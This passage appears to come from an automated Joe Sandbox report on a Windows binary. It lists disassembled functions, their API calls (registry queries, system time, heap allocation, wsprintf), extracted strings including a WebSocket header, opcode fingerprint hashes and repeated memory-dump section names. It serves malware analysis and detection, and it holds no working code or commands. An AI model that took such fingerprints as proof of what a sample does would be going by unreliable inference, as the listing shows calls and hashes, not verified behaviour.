                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6e5c5f5cedf50bef8c81d7bb50c78c5124ebd284e52aa6a6325a5736e303618b
                            • Instruction ID: ec5c12a396e0f3043f9ef174cda0c921182f7e1da8fef2768a9443b30a2d09a3
                            • Opcode Fuzzy Hash: 6e5c5f5cedf50bef8c81d7bb50c78c5124ebd284e52aa6a6325a5736e303618b
                            • Instruction Fuzzy Hash: CC417771A01246AFCB21DFBAD944BEABBF6EF44300F14845DA84997354EB34D946CB90
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 006F1B72
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F184F
                              • Part of subcall function 006F1820: lstrlen.KERNEL32(01006F30), ref: 006F1860
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F1887
                              • Part of subcall function 006F1820: lstrcat.KERNEL32(00000000,00000000), ref: 006F1892
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F18C1
                              • Part of subcall function 006F1820: lstrlen.KERNEL32(00704FA0), ref: 006F18D3
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F18F4
                              • Part of subcall function 006F1820: lstrcat.KERNEL32(00000000,00704FA0), ref: 006F1900
                              • Part of subcall function 006F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006F192F
                            • sscanf.NTDLL ref: 006F1B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F1BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F1BC6
                            • ExitProcess.KERNEL32 ref: 006F1BE3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: a944448c8cdc4eef6f081957f57c62b1082a9fb1872cd468cb0c84170f1aa784
                            • Instruction ID: af1a01c408126b89b68bf2df1634a5f1d5888dfc7c72a2d1b8954a65bf0ac7d5
                            • Opcode Fuzzy Hash: a944448c8cdc4eef6f081957f57c62b1082a9fb1872cd468cb0c84170f1aa784
                            • Instruction Fuzzy Hash: 2C21E4B1518301EF8350DF65D88496BBBF9EFD9254F409A1EF599C3220E730D6048BA6
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F3166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F316D
                            • RegOpenKeyExA.ADVAPI32(80000002,0100B798,00000000,00020119,?), ref: 006F318C
                            • RegQueryValueExA.ADVAPI32(?,0101E538,00000000,00000000,00000000,000000FF), ref: 006F31A7
                            • RegCloseKey.ADVAPI32(?), ref: 006F31B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 50d247dc5566197bcf8794ba5abee43c90da22c5ef75a768c3f80a349f68263c
                            • Instruction ID: 4838f3a5daf7679c6926ec923c7841d76735b1b56b3e1e2e214990197ab786e6
                            • Opcode Fuzzy Hash: 50d247dc5566197bcf8794ba5abee43c90da22c5ef75a768c3f80a349f68263c
                            • Instruction Fuzzy Hash: 7F116DB2A04219AFD710DB94DD49BBBBBBDE748B11F004229FA09E2680DB7459008BA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7baf0860726bcf819c88fc15896ce5e13cac3aef2e1ab7332c6560a7ebebbb6c
                            • Instruction ID: f6759916baa4a9aa2ec33e8cbdff4b06705d1a5f04aba53fa92754f416f211f0
                            • Opcode Fuzzy Hash: 7baf0860726bcf819c88fc15896ce5e13cac3aef2e1ab7332c6560a7ebebbb6c
                            • Instruction Fuzzy Hash: 8D41C37150475CAEDB21CB288D85FFB7BFEAB45704F1444E8EA8A86182E2719B45CF34
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1D5
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D89CD
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 25c7ad36d0d5d26b8d030bd0c6e397b01665a70d5f6e2f24ff95b32102a48b61
                            • Instruction ID: 712ea731bac1d571949851db6bb062ea6fb001cccd86381ab80baadeecf4ac0b
                            • Opcode Fuzzy Hash: 25c7ad36d0d5d26b8d030bd0c6e397b01665a70d5f6e2f24ff95b32102a48b61
                            • Instruction Fuzzy Hash: 6321D6B27002508FC720DA5CE854A6AF7AADBA1761B15097FF181CB381CB71D841C3A9
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8883
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c67fe2bd86fae624156f02408ef35b3eda71391ff856c8156de686ccc419bbf2
                            • Instruction ID: ea32a507f2dcd6f7ee67aaff621f09ce05dfabc50a82ab45605198b21987cd93
                            • Opcode Fuzzy Hash: c67fe2bd86fae624156f02408ef35b3eda71391ff856c8156de686ccc419bbf2
                            • Instruction Fuzzy Hash: 9A31A9B5E005199FCB08DF58C8916AEBBB6EB88350F14C269E915DF385DB34AD01CBD1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5922
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5935
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 4d0a40f47042d72f80d7e6e3c280cae0c25ba63f50f5b62c8a26d898970b54f9
                            • Instruction ID: 2c7132ac5e00f09f3c1d415eb1bd25fb0ed2eba1509c5308e1f555c0946d7aaf
                            • Opcode Fuzzy Hash: 4d0a40f47042d72f80d7e6e3c280cae0c25ba63f50f5b62c8a26d898970b54f9
                            • Instruction Fuzzy Hash: A1117070304B84CBC7258B2CE800B2977E2AB91761F250B9EE3D287795C7A1DC41C7A5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006FA430,000000FF), ref: 006F3D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F3D27
                            • wsprintfA.USER32 ref: 006F3D37
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: eb063118b49216cdf969c98eea1dc67672ca56f31a823902a2c45b227160f592
                            • Instruction ID: 9241027cf65ed6492ce59e5f8f7b1b9380f61b6d3210314934cb9241e698afea
                            • Opcode Fuzzy Hash: eb063118b49216cdf969c98eea1dc67672ca56f31a823902a2c45b227160f592
                            • Instruction Fuzzy Hash: F201CC72648714BFE7209BA4DC0AF6BBBB8FB46B61F000115FA059B2D0CBB41900CAA1
                            APIs
                            • __getptd.LIBCMT ref: 006F9279
                              • Part of subcall function 006F87FF: __amsg_exit.LIBCMT ref: 006F880F
                            • __amsg_exit.LIBCMT ref: 006F9299
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit$__getptd
                            • String ID: Xup$Xup
                            • API String ID: 441000147-1624883197
                            • Opcode ID: 8d060e8a8898b6f86119c543f634a8817a7644e0856bd3e2fa79da6dbdddba83
                            • Instruction ID: 6f6a965e69edb7bb593e26a45671b0ae393421662764fcbf541c226031af8e3f
                            • Opcode Fuzzy Hash: 8d060e8a8898b6f86119c543f634a8817a7644e0856bd3e2fa79da6dbdddba83
                            • Instruction Fuzzy Hash: 5801C032D16B29EADBA5AB2D98057FDB3A27F00B14F144119E61067780CB287E41DBE9
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8737
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 34b82b62339657b7cfec4fc3a6119ff8ce702271272cb483f818da68a9373252
                            • Instruction ID: 93b5f928315ee2ed76f8b396939275308587c177460709ce430bd377f42965ce
                            • Opcode Fuzzy Hash: 34b82b62339657b7cfec4fc3a6119ff8ce702271272cb483f818da68a9373252
                            • Instruction Fuzzy Hash: 92F0B477F000211F8354A43D8D8949FA94796E539033AD766E91AEF399DC70EC8295D4
                            APIs
                              • Part of subcall function 006F781C: __mtinitlocknum.LIBCMT ref: 006F7832
                              • Part of subcall function 006F781C: __amsg_exit.LIBCMT ref: 006F783E
                            • ___addlocaleref.LIBCMT ref: 006F8756
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$Xup$xtp
                            • API String ID: 3105635775-395367854
                            • Opcode ID: e519986ff4080cce9235bdac8963a1ae6eb8b94a4bf7fba8a19dc2854857abcf
                            • Instruction ID: 3f762e1612995ebfa3ab87df8aa149716df32c01243d5c47b4df09693cb51118
                            • Opcode Fuzzy Hash: e519986ff4080cce9235bdac8963a1ae6eb8b94a4bf7fba8a19dc2854857abcf
                            • Instruction Fuzzy Hash: 6301D671845B08DEE760AF79C80575EFBE1AF50324F208A5DE2E6572E0CFB4A604CB18
                            APIs
                            • std::exception::_Copy_str.LIBCMT ref: 006F73F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
